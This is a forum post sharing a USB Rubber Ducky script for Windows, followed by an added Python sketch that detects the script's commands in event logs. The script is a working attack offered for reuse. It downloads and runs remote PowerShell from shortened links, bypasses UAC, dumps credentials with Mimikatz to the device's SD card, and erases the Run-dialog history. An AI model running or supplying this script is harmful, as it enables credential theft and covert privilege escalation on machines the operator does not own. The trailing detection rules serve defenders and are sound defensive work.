Hi all,
I've been playing with the Ducky for some time and figured it was time to give back to the community. I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my Ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer.
The only issue I am having is that when it does the UAC Bypass, it does not recognize the exit after, so there is still a small window present. I suspect it is because the exploit pops the new window up, and likely there is nothing I can do. Hopefully someone can figure it out.
Otherwise it works pretty nicely. Feel free to clean it up and make it better.
REM open cmd and set drive letter
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1
ENTER
DELAY 1000
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm'); Bypass-UAC -Method ucmDismMethod; exit;"
ENTER
DELAY 1000
REM Shrink windows
STRING mode CON: COLS=15 LINES=1
ENTER
REM get Ducky Drive letter
STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'}
ENTER
DELAY 500
REM Run Mimikatz and dump to ducky in file named after computer
STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt");
ENTER
DELAY 1000
STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit
ENTER
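
Seen from the detection side, as an added example that is not part of the original post: the command strings above leave distinctive text in process command-line auditing (Event ID 4688) and PowerShell script block logging (Event ID 4104), and the sketch below groups those indicators per host. The `(host, command text)` event shape, the host names, the placeholder URL and the alert threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Stage -> regex, built from the command strings in the post above.
RULES = {
    "console_shrink": re.compile(r"mode\s+con:?\s+cols=\d{1,2}\s+lines=\d\b", re.I),
    "download_cradle": re.compile(
        r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString", re.I),
    "uac_bypass": re.compile(r"\bBypass-UAC\b", re.I),
    "credential_dump": re.compile(r"\bInvoke-Mimikatz\b", re.I),
    "volume_by_label": re.compile(r"Win32_Volume\b.*\bLabel\s+-eq", re.I),
    "runmru_cleanup": re.compile(r"Remove-ItemProperty\b.*\\RunMRU", re.I),
}
# Stages that warrant an alert on their own (assumed policy).
HIGH_CONFIDENCE = {"uac_bypass", "credential_dump"}

def stages_by_host(events):
    """events: iterable of (host, command_text). Returns {host: set of stages}."""
    hits = defaultdict(set)
    for host, text in events:
        for stage, rx in RULES.items():
            if rx.search(text):
                hits[host].add(stage)
    return dict(hits)

def triage(events, min_stages=3):
    """Alert on any high-confidence stage, or on min_stages weaker ones together."""
    alerts = {}
    for host, stages in stages_by_host(events).items():
        if stages & HIGH_CONFIDENCE or len(stages) >= min_stages:
            alerts[host] = sorted(stages)
    return alerts

# Constructed sample events (hypothetical hosts, placeholder URL), not real logs.
SAMPLE = [
    ("WS-014", r"cmd.exe /T:01 /K mode CON: COLS=15 LINES=1"),
    ("WS-014", r"powershell IEX (New-Object Net.WebClient).DownloadString("
               r"'https://example.invalid/a'); Bypass-UAC -Method ucmDismMethod"),
    ("WS-014", r"$drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'}"),
    ("WS-014", r"$Output = Invoke-Mimikatz -DumpCreds"),
    ("WS-014", r"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows"
               r"\CurrentVersion\Explorer\RunMRU' -Name '*'"),
    ("WS-022", r"Get-WmiObject Win32_Volume | ? { $_.Label -eq 'BACKUP' }"),
    ("WS-031", r"cmd.exe /K mode con: cols=120 lines=40"),
]

if __name__ == "__main__":
    for host, stages in triage(SAMPLE).items():
        print(host, stages)
```

The regexes match plain command text only, so obfuscated or encoded commands would need decoding before this check.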